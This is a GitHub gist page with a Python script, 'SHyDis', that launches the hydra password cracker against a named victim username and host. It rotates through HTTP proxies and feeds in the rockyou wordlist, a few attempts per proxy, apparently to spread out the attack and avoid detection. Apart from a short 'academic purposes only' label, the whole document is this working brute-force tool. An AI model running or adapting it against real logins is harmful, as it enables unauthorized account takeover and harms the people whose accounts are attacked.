Skip to content

Instantly share code, notes, and snippets.

@paced
Last active March 6, 2023 04:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save paced/402798f65d10d581856b5e5ac392a89a to your computer and use it in GitHub Desktop.
Save paced/402798f65d10d581856b5e5ac392a89a to your computer and use it in GitHub Desktop.
Non-stealthy process forking with web-form cracking. For academic purposes only.
#!/usr/bin/python
"""SHyDis V 0.1.1."""
import argparse
import datetime
import os
import subprocess
HYDRA_COMMAND = "hydra -e sr -f -v -w %d -l %s -p %s %s"
TEMP_WORDLIST_FILENAME = "temp_wordlist.txt"
if __name__ == "__main__":
# Read through the arguments from the command line.
parser = argparse.ArgumentParser()
# Add required positional arguments.
parser.add_argument("username",
metavar="username",
help="Username of victim.")
parser.add_argument("target",
metavar="target",
help="Hostname of victim.")
parser.add_argument("proxies",
metavar="proxies",
help="A list of hosts used as HTTP proxies, one per line.")
# Add defaultable (therefore optional) flag arguments.
parser.add_argument("-t", "--tries", help="Tries per proxy.", default=100)
parser.add_argument("-w",
"--wait",
help="Seconds between attempts.",
default=3)
parser.add_argument("-l",
"--wordlist",
help="Where to find the default word list to use in cracking.",
default="/usr/share/wordlists/metasploit/rockyou.txt")
args = parser.parse_args()
# Read in the proxy list.
proxies = list()
with open(args.proxies) as proxy_file:
for row in proxy_file.readlines():
proxies.append(row.rstrip())
# Read in the word list.
wordlist = list()
with open(args.wordlist) as wordlist_file:
for row in wordlist_file.readlines():
wordlist.append(row.rstrip())
wordlist.reverse() # We will be popping, so most common should be last.
# Give warning to the user if they aren't going to cover the wordlist.
ratio = 1.0 * len(wordlist) / (args.tries * len(proxies))
if ratio > 1.01:
print("-- Warning: Your wordlist to total tries ratio is %f.")
print("-- This tool works best at a ratio between 0.5 and 1.0.")
print("-- If the number is too high, increase --tries.")
print("-- Press any key to continue, or ^C to terminate.")
input()
else:
print("-- Ratio is %f." % ratio)
# Tell the user how long this approximately will take.
runtime = str(datetime.timedelta(seconds=len(wordlist) * args.wait))
print("-- Script executing with verbose switch.")
print("-- Estimated runtime: %s" % runtime)
# Execute script per proxy.
for proxy_host in proxies:
env = os.environ.copy()
env["HYDRA_PROXY_HTTP"] = proxy_host
for i in range(0, args.tries):
if len(wordlist) > 0:
command = (
HYDRA_COMMAND % (
args.wait,
args.username,
wordlist.pop(),
args.target
)
)
print("-- EXECUTING: %s" % command)
subprocess.Popen(command, env=env)
else:
break
if len(wordlist) == 0:
break
print("-- Program terminated. Check STDOUT for output.")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment